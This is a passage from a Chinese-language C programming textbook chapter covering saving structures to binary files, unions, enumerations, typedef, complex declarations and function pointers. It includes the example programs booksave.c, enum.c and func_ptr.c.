因为jones和&jones[0]的地址相同,使用数组名是传递结构地址的一种 间接的方法。 由于sum()函数不能改变原始数据,所以该函数使用了ANSI C的限定符 const。 1071 14.8 把结构内容保存到文件中 由于结构可以储存不同类型的信息,所以它是构建数据库的重要工具。 例如,可以用一个结构储存雇员或汽车零件的相关信息。最终,我们要把这 些信息储存在文件中,并且能再次检索。数据库文件可以包含任意数量的此 类数据对象。储存在一个结构中的整套信息被称为记录(record),单独的 项被称为字段(field)。本节我们来探讨这个主题。 或许储存记录最没效率的方法是用fprintf()。例如,回忆程序清单14.1中 的book结构: #define MAXTITL 40 #define MAXAUTL 40 struct book { char title[MAXTITL]; char author[MAXAUTL]; float value; }; 如果pbook标识一个文件流,那么通过下面这条语句可以把信息储存在 struct book类型的结构变量primer中: fprintf(pbooks, "%s %s %.2f\n", primer.title,primer.author, primer.value); 对于一些结构(如,有 30 个成员的结构),这个方法用起来很不方 便。另外,在检索时还存在问题,因为程序要知道一个字段结束和另一个字 段开始的位置。虽然用固定字段宽度的格式可以解决这个问题(例 如,"%39s%39s%8.2f"),但是这个方法仍然很笨拙。 1072 更好的方案是使用fread()和fwrite()函数读写结构大小的单元。回忆一 下,这两个函数使用与程序相同的二进制表示法。例如: fwrite(&primer, sizeof(struct book), 1, pbooks); 定位到 primer 结构变量开始的位置,并把结构中所有的字节都拷贝到 与 pbooks 相关的文件中。sizeof(struct book)告诉函数待拷贝的一块数据的大 小,1 表明一次拷贝一块数据。带相同参数的fread()函数从文件中拷贝一块 结构大小的数据到&primer指向的位置。简而言之,这两个函数一次读写整 个记录,而不是一个字段。 以二进制表示法储存数据的缺点是,不同的系统可能使用不同的二进制 表示法,所以数据文件可能不具可移植性。甚至同一个系统,不同编译器设 置也可能导致不同的二进制布局。 14.8.1 保存结构的程序示例 为了演示如何在程序中使用这些函数,我们把程序清单14.2修改为一个 新的版本(即程序清单14.14),把书名保存在book.dat文件中。如果该文件 已存在,程序将显示它当前的内容,然后允许在文件中添加内容(如果你使 用的是早期的Borland编译器,请参阅程序清单14.2后面的“Borland C和浮点 数”)。 程序清单14.14 booksave.c程序 /* booksave.c -- 在文件中保存结构中的内容 */ #include <stdio.h> #include <stdlib.h> #include <string.h> #define MAXTITL 40 1073 #define MAXAUTL 40 #define MAXBKS 10     /* 最大书籍数量 */ char * s_gets(char * st, int n); struct book {       /* 建立 book 模板 */ char title[MAXTITL]; char author[MAXAUTL]; float value; }; int main(void) { struct book library[MAXBKS]; /* 结构数组 */ int count = 0; int index, filecount; FILE * pbooks; int size = sizeof(struct book); if ((pbooks = fopen("book.dat", "a+b")) == NULL) { fputs("Can't open book.dat file\n", stderr); exit(1); 1074 } rewind(pbooks);      /* 定位到文件开始 */ while (count < MAXBKS && fread(&library[count], size, 1, pbooks) == 1) { if (count == 0) puts("Current contents of book.dat:"); printf("%s by %s: $%.2f\n", library[count].title, library[count].author, library[count].value); count++; } filecount = count; if (count == MAXBKS) { fputs("The book.dat file is full.", stderr); exit(2); } puts("Please add new book titles."); puts("Press [enter] at the start of a line to stop."); 1075 while (count < MAXBKS && s_gets(library[count].title, MAXTITL) != NULL && library[count].title[0] != '\0') { puts("Now enter the author."); s_gets(library[count].author, MAXAUTL); puts("Now enter the value."); scanf("%f", &library[count++].value); while (getchar() != '\n') continue;     /* 清理输入行 */ if (count < MAXBKS) puts("Enter the next title."); } if (count > 0) { puts("Here is the list of your books:"); for (index = 0; index < count; index++) printf("%s by %s: $%.2f\n", library[index].title, library[index].author, library[index].value); 1076 fwrite(&library[filecount], size, count - filecount, pbooks); } else puts("No books? Too bad.\n"); puts("Bye.\n"); fclose(pbooks); return 0; } char * s_gets(char * st, int n) { char * ret_val; char * find; ret_val = fgets(st, n, stdin); if (ret_val) { find = strchr(st, '\n');  // 查找换行符 if (find)       // 如果地址不是 NULL, *find = '\0';     // 在此处放置一个空字符 1077 else while (getchar() != '\n') continue;   // 清理输入行 } return ret_val; } 我们先看几个运行示例,然后再讨论程序中的要点。 $ booksave Please add new book titles. Press [enter] at the start of a line to stop. Metric Merriment Now enter the author. Polly Poetica Now enter the value. 18.99 Enter the next title. Deadly Farce Now enter the author. Dudley Forse 1078 Now enter the value. 15.99 Enter the next title. [enter] Here is the list of your books: Metric Merriment by Polly Poetica: $18.99 Deadly Farce by Dudley Forse: $15.99 Bye. $ booksave Current contents of book.dat: Metric Merriment by Polly Poetica: $18.99 Deadly Farce by Dudley Forse: $15.99 Please add new book titles. The Third Jar Now enter the author. Nellie Nostrum Now enter the value. 22.99 Enter the next title. 1079 [enter] Here is the list of your books: Metric Merriment by Polly Poetica: $18.99 Deadly Farce by Dudley Forse: $15.99 The Third Jar by Nellie Nostrum: $22.99 Bye. $ 再次运行booksave.c程序把这3本书作为当前的文件记录打印出来。 14.8.2 程序要点 首先,以"a+b"模式打开文件。a+部分允许程序读取整个文件并在文件 的末尾添加内容。b 是 ANSI的一种标识方法,表明程序将使用二进制文件 格式。对于不接受b模式的UNIX系统,可以省略b,因为UNIX只有一种文件 形式。对于早期的ANSI实现,要找出和b等价的表示法。 我们选择二进制模式是因为fread()和fwrite()函数要使用二进制文件。虽 然结构中有些内容是文本,但是value成员不是文本。如果使用文本编辑器 查看book.dat,该结构本文部分的内容显示正常,但是数值部分的内容不可 读,甚至会导致文本编辑器出现乱码。 rewrite()函数确保文件指针位于文件开始处,为读文件做好准备。 第1个while循环每次把一个结构读到结构数组中,当数组已满或读完文 件时停止。变量filecount统计已读结构的数量。 第2个while按下循环提示用户进行输入,并接受用户的输入。和程序清 单14.2一样,当数组已满或用户在一行的开始处按下Enter键时,循环结束。 1080 注意,该循环开始时count变量的值是第1个循环结束后的值。该循环把新输 入项添加到数组的末尾。 然后for循环打印文件和用户输入的数据。因为该文件是以附加模式打 开,所以新写入的内容添加到文件现有内容的末尾。 我们本可以用一个循环在文件末尾一次添加一个结构,但还是决定用 fwrite()一次写入一块数据。对表达式count - filecount求值得新添加的书籍数 量,然后调用fwrite()把结构大小的块写入文件。由于表达式 &library[filecount]是数组中第1个新结构的地址,所以拷贝就从这里开始。 也许该例是把结构写入文件和检索它们的最简单的方法,但是这种方法 浪费存储空间,因为这还保存了结构中未使用的部分。该结构的大小是 2×40×sizeof(char)+sizeof(float),在我们的系统中共84字节。实际上不是每个 输入项都需要这么多空间。但是,让每个输入块的大小相同在检索数据时很 方便。 另一个方法是使用可变大小的记录。为了方便读取文件中的这种记录, 每个记录以数值字段规定记录的大小。这比上一种方法复杂。通常,这种方 法涉及接下来要介绍的“链式结构”和第16章的动态内存分配。 1081 14.9 链式结构 在结束讨论结构之前,我们想简要介绍一下结构的多种用途之一:创建 新的数据形式。计算机用户已经开发出的一些数据形式比我们提到过的数组 和简单结构更有效地解决特定的问题。这些形式包括队列、二叉树、堆、哈 希表和图表。许多这样的形式都由链式结构(linked structure)组成。通 常,每个结构都包含一两个数据项和一两个指向其他同类型结构的指针。这 些指针把一个结构和另一个结构链接起来,并提供一种路径能遍历整个彼此 链接的结构。例如,图14.3演示了一个二叉树结构,每个单独的结构(或节 点)都和它下面的两个结构(或节点)相连。 图14.3 一个二叉树结构 图14.3中显示的分级或树状的结构是否比数组高效?考虑一个有10级节 点的树的情况。它有210−1(或1023)个节点,可以储存1023个单词。如果 这些单词以某种规则排列,那么可以从最顶层开始,逐级向下移动查找单 词,最多只需移动9次便可找到任意单词。如果把这些单词都放在一个数组 中,最多要查找1023个元素才能找出所需的单词。 如果你对这些高级概念感兴趣,可以阅读一些关于数据结构的书籍。使 用C结构,可以创建和使用那些书中介绍的各种数据形式。另外,第17章中 也介绍了一些高级数据形式。 本章对结构的概念介绍至此为止,第17章中会给出链式结构的例子。下 1082 面,我们介绍C语言中的联合、枚举和typedef。 1083 14.10 联合简介 联合(union)是一种数据类型,它能在同一个内存空间中储存不同的 数据类型(不是同时储存)。其典型的用法是,设计一种表以储存既无规 律、事先也不知道顺序的混合类型。使用联合类型的数组,其中的联合都大 小相等,每个联合可以储存各种数据类型。 创建联合和创建结构的方式相同,需要一个联合模板和联合变量。可以 用一个步骤定义联合,也可以用联合标记分两步定义。下面是一个带标记的 联合模板: union hold { int digit; double bigfl; char letter; }; 根据以上形式声明的结构可以储存一个int类型、一个double类型和char 类型的值。然而,声明的联合只能储存一个int类型的值或一个double类型的 值或char类型的值。 下面定义了3个与hold类型相关的变量: union hold fit;    // hold类型的联合变量 union hold save[10];  // 内含10个联合变量的数组 union hold * pu;   // 指向hold类型联合变量的指针 第1个声明创建了一个单独的联合变量fit。编译器分配足够的空间以便 它能储存联合声明中占用最大字节的类型。在本例中,占用空间最大的是 1084 double类型的数据。在我们的系统中,double类型占64位,即8字节。第2个 声明创建了一个数组save,内含10个元素,每个元素都是8字节。第3个声明 创建了一个指针,该指针变量储存hold类型联合变量的地址。 可以初始化联合。需要注意的是,联合只能储存一个值,这与结构不 同。有 3 种初始化的方法:把一个联合初始化为另一个同类型的联合;初始 化联合的第1个元素;或者根据C99标准,使用指定初始化器: union hold valA; valA.letter = 'R'; union hold valB = valA;       // 用另一个联合来初始化 union hold valC = {88};       // 初始化联合的digit 成员 union hold valD = {.bigfl = 118.2}; // 指定初始化器 14.10.1 使用联合 下面是联合的一些用法: fit.digit = 23; //把 23 储存在 fit,占2字节 fit.bigfl = 2.0; // 清除23,储存 2.0,占8字节 fit.letter = 'h'; // 清除2.0,储存h,占1字节 点运算符表示正在使用哪种数据类型。在联合中,一次只储存一个值。 即使有足够的空间,也不能同时储存一个char类型值和一个int类型值。编写 代码时要注意当前储存在联合中的数据类型。 和用指针访问结构使用->运算符一样,用指针访问联合时也要使用->运 算符: pu = &fit; 1085 x = pu->digit; // 相当于 x = fit.digit 不要像下面的语句序列这样: fit.letter = 'A'; flnum = 3.02*fit.bigfl; // 错误 以上语句序列是错误的,因为储存在 fit 中的是 char 类型,但是下一行 却假定 fit 中的内容是double类型。 不过,用一个成员把值储存在一个联合中,然后用另一个成员查看内 容,这种做法有时很有用。下一章的程序清单15.4就给出了一个这样的例 子。 联合的另一种用法是,在结构中储存与其成员有从属关系的信息。例 如,假设用一个结构表示一辆汽车。如果汽车属于驾驶者,就要用一个结构 成员来描述这个所有者。如果汽车被租赁,那么需要一个成员来描述其租赁 公司。可以用下面的代码来完成: struct owner { char socsecurity[12]; ... }; struct leasecompany { char name[40]; char headquarters[40]; ... 1086 }; union data { struct owner owncar; struct leasecompany leasecar; }; struct car_data { char make[15]; int status; /* 私有为0,租赁为1 */ union data ownerinfo; ... }; 假设flits是car_data类型的结构变量,如果flits.status为0,程序将使用 flits.ownerinfo.owncar.socsecurity,如果flits.status为1,程序则使用 flits.ownerinfo.leasecar.name。 14.10.2 匿名联合(C11) 匿名联合和匿名结构的工作原理相同,即匿名联合是一个结构或联合的 无名联合成员。例如,我们重新定义car_data结构如下: struct owner { char socsecurity[12]; ... 1087 }; struct leasecompany { char name[40]; char headquarters[40]; ... }; struct car_data { char make[15]; int status; /* 私有为0,租赁为1 */ union { struct owner owncar; struct leasecompany leasecar; }; . }; 现在,如果 flits 是 car_data 类型的结构变量,可以用 flits.owncar.socsecurity 代替flits.ownerinfo.owncar.socsecurity。 总结:结构和联合运算符 成员运算符:. 1088 一般注释: 该运算符与结构或联合名一起使用,指定结构或联合的一个成员。如果 name是一个结构的名称, member是该结构模版指定的一个成员名,下面标 识了该结构的这个成员: name.member name.member的类型就是member的类型。联合使用成员运算符的方式与 结构相同。 示例: struct { int code; float cost; } item; item.code = 1265; 间接成员运算符:-> 一般注释: 该运算符和指向结构或联合的指针一起使用,标识结构或联合的一个成 员。假设ptrstr是指向结构的指针,member是该结构模版指定的一个成员, 那么: ptrstr->member 标识了指向结构的成员。联合使用间接成员运算符的方式与结构相同。 示例: 1089 struct { int code; float cost; } item, * ptrst; ptrst = &item; ptrst->code = 3451; 最后一条语句把一个int类型的值赋给item的code成员。如下3个表达式 是等价的: ptrst->code   item.code    (*ptrst).code 1090 14.11 枚举类型 可以用枚举类型(enumerated type)声明符号名称来表示整型常量。使 用enum关键字,可以创建一个新“类型”并指定它可具有的值(实际上,enum 常量是int类型,因此,只要能使用int类型的地方就可以使用枚举类型)。枚 举类型的目的是提高程序的可读性。它的语法与结构的语法相同。例如,可 以这样声明: enum spectrum {red, orange, yellow, green, blue, violet}; enum spectrum color; 第1个声明创建了spetrum作为标记名,允许把enum spetrum作为一个类型 名使用。第2个声明使color作为该类型的变量。第1个声明中花括号内的标 识符枚举了spectrum变量可能有的值。因此, color 可能的值是 red、 orange、yellow 等。这些符号常量被称为枚举符(enumerator)。然后,便 可这样用: int c; color = blue; if (color == yellow) ...; for (color = red; color <= violet; color++) ...; 虽然枚举符(如red和blue)是int类型,但是枚举变量可以是任意整数类 型,前提是该整数类型可以储存枚举常量。例如,spectrum的枚举符范围是 0~5,所以编译器可以用unsigned char来表示color变量。 1091 顺带一提,C枚举的一些特性并不适用于C++。例如,C允许枚举变量 使用++运算符,但是C++标准不允许。所以,如果编写的代码将来会并入 C++程序,那么必须把上面例子中的color声明为int类型,才能C和C++都兼 容。 14.11.1 enum常量 blue和red到底是什么?从技术层面看,它们是int类型的常量。例如,假 定有前面的枚举声明,可以这样写: printf("red = %d, orange = %d\n", red, orange); 其输出如下: red = 0, orange = 1 red成为一个有名称的常量,代表整数0。类似地,其他标识符都是有名 称的常量,分别代表1~5。只要是能使用整型常量的地方就可以使用枚举常 量。例如,在声明数组时,可以用枚举常量表示数组的大小;在switch语句 中,可以把枚举常量作为标签。 14.11.2 默认值 默认情况下,枚举列表中的常量都被赋予0、1、2等。因此,下面的声 明中nina的值是3: enum kids {nippy, slats, skippy, nina, liz}; 14.11.3 赋值 在枚举声明中,可以为枚举常量指定整数值: enum levels {low = 100, medium = 500, high = 2000}; 如果只给一个枚举常量赋值,没有对后面的枚举常量赋值,那么后面的 1092 常量会被赋予后续的值。例如,假设有如下的声明: enum feline {cat, lynx = 10, puma, tiger}; 那么,cat的值是0(默认),lynx、puma和tiger的值分别是10、11、 12。 14.11.4 enum的用法 枚举类型的目的是为了提高程序的可读性和可维护性。如果要处理颜 色,使用red和blue比使用0和1更直观。注意,枚举类型只能在内部使用。如 果要输入color中orange的值,只能输入1,而不是单词orange。或者,让程序 先读入字符串"orange",再将其转换为orange代表的值。 因为枚举类型是整数类型,所以可以在表达式中以使用整数变量的方式 使用enum变量。它们用在case语句中很方便。 程序清单14.15演示了一个使用enum的小程序。该程序示例使用默认值 的方案,把red的值设置为0,使之成为指向字符串"red"的指针的索引。 程序清单14.15 enum.c程序 /* enum.c -- 使用枚举类型的值 */ #include <stdio.h> #include <string.h>  // 提供 strcmp()、strchr()函数的原型 #include <stdbool.h>  // C99 特性 char * s_gets(char * st, int n); enum spectrum { red, orange, yellow, green, blue, violet }; const char * colors [] = { "red", "orange", "yellow", 1093 "green", "blue", "violet" }; #define LEN 30 int main(void) { char choice[LEN]; enum spectrum color; bool color_is_found = false; puts("Enter a color (empty line to quit):"); while (s_gets(choice, LEN) != NULL && choice[0] != '\0') { for (color = red; color <= violet; color++) { if (strcmp(choice, colors[color]) == 0) { color_is_found = true; break; } } if (color_is_found) 1094 switch (color) { case red: puts("Roses are red."); break; case orange: puts("Poppies are orange."); break; case yellow: puts("Sunflowers are yellow."); break; case green: puts("Grass is green."); break; case blue: puts("Bluebells are blue."); break; case violet: puts("Violets are violet."); break; } else printf("I don't know about the color %s.\n", choice); color_is_found = false; puts("Next color, please (empty line to quit):"); 1095 } puts("Goodbye!"); return 0; } char * s_gets(char * st, int n) { char * ret_val; char * find; ret_val = fgets(st, n, stdin); if (ret_val) { find = strchr(st, '\n');  // 查找换行符 if (find)          // 如果地址不是 NULL, *find = '\0';     // 在此处放置一个空字符 else while (getchar() != '\n') continue;     // 清理输入行 } return ret_val; 1096 } 当输入的字符串与color数组的成员指向的字符串相匹配时,for循环结 束。如果循环找到匹配的颜色,程序就用枚举变量的值与作为case标签的枚 举常量匹配。下面是该程序的一个运行示例: Enter a color (empty line to quit): blue Bluebells are blue. Next color, please (empty line to quit): orange Poppies are orange. Next color, please (empty line to quit): purple I don't know about the color purple. Next color, please (empty line to quit): Goodbye! 14.11.5 共享名称空间 C语言使用名称空间(namespace)标识程序中的各部分,即通过名称来 识别。作用域是名称空间概念的一部分:两个不同作用域的同名变量不冲 突;两个相同作用域的同名变量冲突。名称空间是分类别的。在特定作用域 中的结构标记、联合标记和枚举标记都共享相同的名称空间,该名称空间与 普通变量使用的空间不同。这意味着在相同作用域中变量和标记的名称可以 相同,不会引起冲突,但是不能在相同作用域中声明两个同名标签或同名变 1097 量。例如,在C中,下面的代码不会产生冲突: struct rect { double x; double y; }; int rect; // 在C中不会产生冲突 尽管如此,以两种不同的方式使用相同的标识符会造成混乱。另外, C++不允许这样做,因为它把标记名和变量名放在相同的名称空间中。 1098 14.12 typedef简介 typedef工具是一个高级数据特性,利用typedef可以为某一类型自定义名 称。这方面与#define类似,但是两者有3处不同: 与#define不同,typedef创建的符号名只受限于类型,不能用于值。 typedef由编译器解释,不是预处理器。 在其受限范围内,typedef比#define更灵活。 下面介绍typedef的工作原理。假设要用BYTE表示1字节的数组。只需像 定义个char类型变量一样定义BYTE,然后在定义前面加上关键字typedef即 可: typedef unsigned char BYTE; 随后,便可使用BYTE来定义变量: BYTE x, y[10], * z; 该定义的作用域取决于typedef定义所在的位置。如果定义在函数中,就 具有局部作用域,受限于定义所在的函数。如果定义在函数外面,就具有文 件作用域。 通常,typedef定义中用大写字母表示被定义的名称,以提醒用户这个类 型名实际上是一个符号缩写。当然,也可以用小写: typedef unsigned char byte; typedef中使用的名称遵循变量的命名规则。 为现有类型创建一个名称,看上去真是多此一举,但是它有时的确很有 用。在前面的示例中,用BYTE代替unsigned char表明你打算用BYTE类型的 变量表示数字,而不是字符码。使用typedef还能提高程序的可移植性。例 1099 如,我们之前提到的sizeof运算符的返回类型:size_t类型,以及time()函数 的返回类型:time_t类型。C标准规定sizeof和time()返回整数类型,但是让实 现来决定具体是什么整数类型。其原因是,C 标准委员会认为没有哪个类型 对于所有的计算机平台都是最优选择。所以,标准委员会决定建立一个新的 类型名(如,time_t),并让实现使用typedef来设置它的具体类型。以这样 的方式,C标准提供以下通用原型: time_t time(time_t *); time_t 在一个系统中是 unsigned long,在另一个系统中可以是 unsigned long long。只要包含time.h头文件,程序就能访问合适的定义,你也可以在 代码中声明time_t类型的变量。 typedef的一些特性与#define的功能重合。例如: #define BYTE unsigned char 这使预处理器用BYTE替换unsigned char。但是也有#define没有的功能: typedef char * STRING; 没有typedef关键字,编译器将把STRING识别为一个指向char的指针变 量。有了typedef关键字,编译器则把STRING解释成一个类型的标识符,该 类型是指向char的指针。因此: STRING name, sign; 相当于: char * name, * sign; 但是,如果这样假设: #define STRING char * 1100 然后,下面的声明: STRING name, sign; 将被翻译成: char * name, sign; 这导致只有name才是指针。 还可以把typedef用于结构: typedef struct complex { float real; float imag; } COMPLEX; 然后便可使用COMPLEX类型代替complex结构来表示复数。使用typedef 的第1个原因是:为经常出现的类型创建一个方便、易识别的类型名。例 如,前面的例子中,许多人更倾向于使用 STRING 或与其等价的标记。 用typedef来命名一个结构类型时,可以省略该结构的标签: typedef struct {double x; double y;} rect; 假设这样使用typedef定义的类型名: rect r1 = {3.0, 6.0}; rect r2; 以上代码将被翻译成: struct {double x; double y;} r1= {3.0, 6.0}; 1101 struct {double x; double y;} r2; r2 = r1; 这两个结构在声明时都没有标记,它们的成员完全相同(成员名及其类 型都匹配),C认为这两个结构的类型相同,所以r1和r2间的赋值是有效操 作。 使用typedef的第2个原因是:typedef常用于给复杂的类型命名。例如, 下面的声明: typedef char (* FRPTC ()) [5]; 把FRPTC声明为一个函数类型,该函数返回一个指针,该指针指向内含 5个char类型元素的数组(参见下一节的讨论)。 使用typedef时要记住,typedef并没有创建任何新类型,它只是为某个已 存在的类型增加了一个方便使用的标签。以前面的STRING为例,这意味着 我们创建的STRING类型变量可以作为实参传递给以指向char指针作为形参 的函数。 通过结构、联合和typedef,C提供了有效处理数据的工具和处理可移植 数据的工具。 1102 14.13 其他复杂的声明 C 允许用户自定义数据形式。虽然我们常用的是一些简单的形式,但是 根据需要有时还会用到一些复杂的形式。在一些复杂的声明中,常包含下面 的符号,如表14.1所示: 表14.1 声明时可使用的符号 下面是一些较复杂的声明示例: int board[8][8];    // 声明一个内含int数组的数组 int ** ptr;      // 声明一个指向指针的指针,被指向的指针指向int int * risks[10];   // 声明一个内含10个元素的数组,每个元素都是一 个指向int的指针 int (* rusks)[10];  // 声明一个指向数组的指针,该数组内含10个int类 型的值 int * oof[3][4];   // 声明一个3×4 的二维数组,每个元素都是指向int 的指针 int (* uuf)[3][4];  // 声明一个指向3×4二维数组的指针,该数组中内含 int类型值 int (* uof[3])[4];  // 声明一个内含3个指针元素的数组,其中每个指针 都指向一个内含4个int类型元素的数组 要看懂以上声明,关键要理解*、()和[]的优先级。记住下面几条规则。 1103 1.数组名后面的[]和函数名后面的()具有相同的优先级。它们比*(解引 用运算符)的优先级高。因此下面声明的risk是一个指针数组,不是指向数 组的指针: int * risks[10]; 2.[]和()的优先级相同,由于都是从左往右结合,所以下面的声明中, 在应用方括号之前,*先与rusks结合。因此rusks是一个指向数组的指针,该 数组内含10个int类型的元素: int (* rusks)[10]; 3.[]和()都是从左往右结合。因此下面声明的goods是一个由12个内含50 个int类型值的数组组成的二维数组,不是一个有50个内含12个int类型值的数 组组成的二维数组: int goods[12][50]; 把以上规则应用于下面的声明: int * oof[3][4]; [3]比*的优先级高,由于从左往右结合,所以[3]先与oof结合。因此, oof首先是一个内含3个元素的数组。然后再与[4]结合,所以oof的每个元素 都是内含4个元素的数组。*说明这些元素都是指针。最后,int表明了这4个 元素都是指向int的指针。因此,这条声明要表达的是:foo是一个内含3个元 素的数组,其中每个元素是由4个指向int的指针组成的数组。简而言之,oof 是一个3×4的二维数组,每个元素都是指向int的指针。编译器要为12个指针 预留存储空间。 现在来看下面的声明: int (* uuf)[3][4]; 圆括号使得*先与uuf结合,说明uuf是一个指针,所以uuf是一个指向3×4 1104 的int类型二维数组的指针。编译器要为一个指针预留存储空间。 根据这些规则,还可以声明: char * fump(int);     // 返回字符指针的函数 char (* frump)(int);   // 指向函数的指针,该函数的返回类型为char char (* flump[3])(int);  // 内含3个指针的数组,每个指针都指向返回 类型为char的函数 这3个函数都接受int类型的参数。 可以使用typedef建立一系列相关类型: typedef int arr5[5]; typedef arr5 * p_arr5; typedef p_arr5 arrp10[10]; arr5 togs;  // togs 是一个内含5个int类型值的数组 p_arr5 p2;  // p2 是一个指向数组的指针,该数组内含5个int类型的值 arrp10 ap;  // ap 是一个内含10个指针的数组,每个指针都指向一个 内含5个int类型值的数组 如果把这些放入结构中,声明会更复杂。至于应用,我们就不再进一步 讨论了。 1105 14.14 函数和指针 通过上一节的学习可知,可以声明一个指向函数的指针。这个复杂的玩 意儿到底有何用处?通常,函数指针常用作另一个函数的参数,告诉该函数 要使用哪一个函数。例如,排序数组涉及比较两个元素,以确定先后。如果 元素是数字,可以使用>运算符;如果元素是字符串或结构,就要调用函数 进行比较。C库中的 qsort()函数可以处理任意类型的数组,但是要告诉 qsort()使用哪个函数来比较元素。为此, qsort()函数的参数列表中,有一个 参数接受指向函数的指针。然后,qsort()函数使用该函数提供的方案进行排 序,无论这个数组中的元素是整数、字符串还是结构。 我们来进一步研究函数指针。首先,什么是函数指针?假设有一个指向 int类型变量的指针,该指针储存着这个int类型变量储存在内存位置的地址。 同样,函数也有地址,因为函数的机器语言实现由载入内存的代码组成。指 向函数的指针中储存着函数代码的起始处的地址。 其次,声明一个数据指针时,必须声明指针所指向的数据类型。声明一 个函数指针时,必须声明指针指向的函数类型。为了指明函数类型,要指明 函数签名,即函数的返回类型和形参类型。例如,考虑下面的函数原型: void ToUpper(char *); // 把字符串中的字符转换成大写字符 ToUpper()函数的类型是“带char * 类型参数、返回类型是void的函数”。 下面声明了一个指针pf指向该函数类型: void (*pf)(char *);  // pf 是一个指向函数的指针 从该声明可以看出,第1对圆括号把*和pf括起来,表明pf是一个指向函 数的指针。因此,(*pf)是一个参数列表为(char *)、返回类型为void的函数。 注意,把函数名ToUpper替换为表达式(*pf)是创建指向函数指针最简单的方 式。所以,如果想声明一个指向某类型函数的指针,可以写出该函数的原型 后把函数名替换成(*pf)形式的表达式,创建函数指针声明。前面提到过,由 于运算符优先级的规则,在声明函数指针时必须把*和指针名括起来。如果 1106 省略第1个圆括号会导致完全不同的情况: void *pf(char *); // pf 是一个返回字符指针的函数 提示 要声明一个指向特定类型函数的指针,可以先声明一个该类型的函数, 然后把函数名替换成(*pf)形式的表达式。然后,pf就成为指向该类型函数的 指针。 声明了函数指针后,可以把类型匹配的函数地址赋给它。在这种上下文 中,函数名可以用于表示函数的地址: void ToUpper(char *); void ToLower(char *); int round(double); void (*pf)(char *); pf = ToUpper;   // 有效,ToUpper是该类型函数的地址 pf = ToLower;   //有效,ToUpper是该类型函数的地址 pf = round;    // 无效,round与指针类型不匹配 pf = ToLower();  // 无效,ToLower()不是地址 最后一条语句是无效的,不仅因为 ToLower()不是地址,而且 ToLower()的返回类型是 void,它没有返回值,不能在赋值语句中进行赋 值。注意,指针pf可以指向其他带char *类型参数、返回类型是void的函数, 不能指向其他类型的函数。 既然可以用数据指针访问数据,也可以用函数指针访问函数。奇怪的 是,有两种逻辑上不一致的语法可以这样做,下面解释: 1107 void ToUpper(char *); void ToLower(char *); void (*pf)(char *); char mis[] = "Nina Metier"; pf = ToUpper; (*pf)(mis);  // 把ToUpper 作用于(语法1) pf = ToLower; pf(mis);   // 把ToLower 作用于(语法2) 这两种方法看上去都合情合理。先分析第1种方法:由于pf指向ToUpper 函数,那么*pf就相当于ToUpper函数,所以表达式(*pf)(mis)和ToUpper(mis) 相同。从ToUpper函数和pf的声明就能看出,ToUpper和(*pf)是等价的。第2 种方法:由于函数名是指针,那么指针和函数名可以互换使用,所以pf(mis) 和ToUpper(mis)相同。从pf的赋值表达式语句就能看出ToUpper和pf是等价 的。由于历史的原因,贝尔实验室的C和UNIX的开发者采用第1种形式,而 伯克利的UNIX推广者却采用第2种形式。K&R C不允许第2种形式。但是, 为了与现有代码兼容,ANSI C认为这两种形式(本例中是(*pf)(mis)和 pf(mis))等价。后续的标准也延续了这种矛盾的和谐。 作为函数的参数是数据指针最常见的用法之一,函数指针亦如此。例 如,考虑下面的函数原型: void show(void (* fp)(char *), char * str); 这看上去让人头晕。它声明了两个形参:fp和str。fp形参是一个函数指 针,str是一个数据指针。更具体地说,fp指向的函数接受char * 类型的参 数,其返回类型为void;str指向一个char类型的值。因此,假设有上面的声 明,可以这样调用函数: 1108 show(ToLower, mis);  /* show()使用ToLower()函数:fp = ToLower */ show(pf, mis);    /* show()使用pf指向的函数: fp = pf */ show()如何使用传入的函数指针?是用fp()语法还是(*fp)()语法调用函 数: void show(void (* fp)(char *), char * str) { (*fp)(str); /* 把所选函数作用于str */ puts(str);    /* 显示结果 */ } 例如,这里的show()首先用fp指向的函数转换str,然后显示转换后的字 符串。 顺带一提,把带返回值的函数作为参数传递给另一个函数有两种不同的 方法。例如,考虑下面的语句: function1(sqrt);   /* 传递sqrt()函数的地址 */ function2(sqrt(4.0)); /* 传递sqrt()函数的返回值 */ 第1条语句传递的是sqrt()函数的地址,假设function1()在其代码中会使 用该函数。第2条语句先调用sqrt()函数,然后求值,并把返回值(该例中是 2.0)传递给function2()。 程序清单14.16中的程序通过show()函数来演示这些要点,该函数以各 种转换函数作为参数。该程序也演示了一些处理菜单的有用技巧。 程序清单14.16 func_ptr.c程序 1109 // func_ptr.c -- 使用函数指针 #include <stdio.h> #include <string.h> #include <ctype.h> #define LEN 81 char * s_gets(char * st, int n); char showmenu(void); void eatline(void);    // 读取至行末尾 void show(void(*fp)(char *), char * str); void ToUpper(char *);   // 把字符串转换为大写 void ToLower(char *);   // 把字符串转换为小写 void Transpose(char *);  // 大小写转置 void Dummy(char *);    // 不更改字符串 int main(void) { char line[LEN]; char copy[LEN]; char choice; void(*pfun)(char *); // 声明一个函数指针,被指向的函数接受char *类型 1110 的参数,无返回值 puts("Enter a string (empty line to quit):"); while (s_gets(line, LEN) != NULL && line[0] != '\0') { while ((choice = showmenu()) != 'n') { switch (choice) // switch语句设置指针 { case 'u': pfun = ToUpper;  break; case 'l': pfun = ToLower;  break; case 't': pfun = Transpose; break; case 'o': pfun = Dummy;  break; } strcpy(copy, line);  // 为show()函数拷贝一份 show(pfun, copy);   // 根据用户的选择,使用选定的函数 } puts("Enter a string (empty line to quit):"); } puts("Bye!"); 1111 return 0; } char showmenu(void) { char ans; puts("Enter menu choice:"); puts("u) uppercase   l) lowercase"); puts("t) transposed case o) original case"); puts("n) next string"); ans = getchar();    // 获取用户的输入 ans = tolower(ans);  // 转换为小写 eatline();       // 清理输入行 while (strchr("ulton", ans) == NULL) { puts("Please enter a u, l, t, o, or n:"); ans = tolower(getchar()); eatline(); } return ans; 1112 } void eatline(void) { while (getchar() != '\n') continue; } void ToUpper(char * str) { while (*str) { *str = toupper(*str); str++; } } void ToLower(char * str) { while (*str) { *str = tolower(*str); 1113 str++; } } void Transpose(char * str) { while (*str) { if (islower(*str)) *str = toupper(*str); else if (isupper(*str)) *str = tolower(*str); str++; } } void Dummy(char * str) { // 不改变字符串 } void show(void(*fp)(char *), char * str) 1114 { (*fp)(str);  // 把用户选定的函数作用于str puts(str);  // 显示结果 } char * s_gets(char * st, int n) { char * ret_val; char * find; ret_val = fgets(st, n, stdin); if (ret_val) { find = strchr(st, '\n');  // 查找换行符 if (find)          // 如果地址不是NULL, *find = '\0';     // 在此处放置一个空字符 else while (getchar() != '\n') continue;     // 清理输入行中剩余的字符 } return ret_val; 1115 } 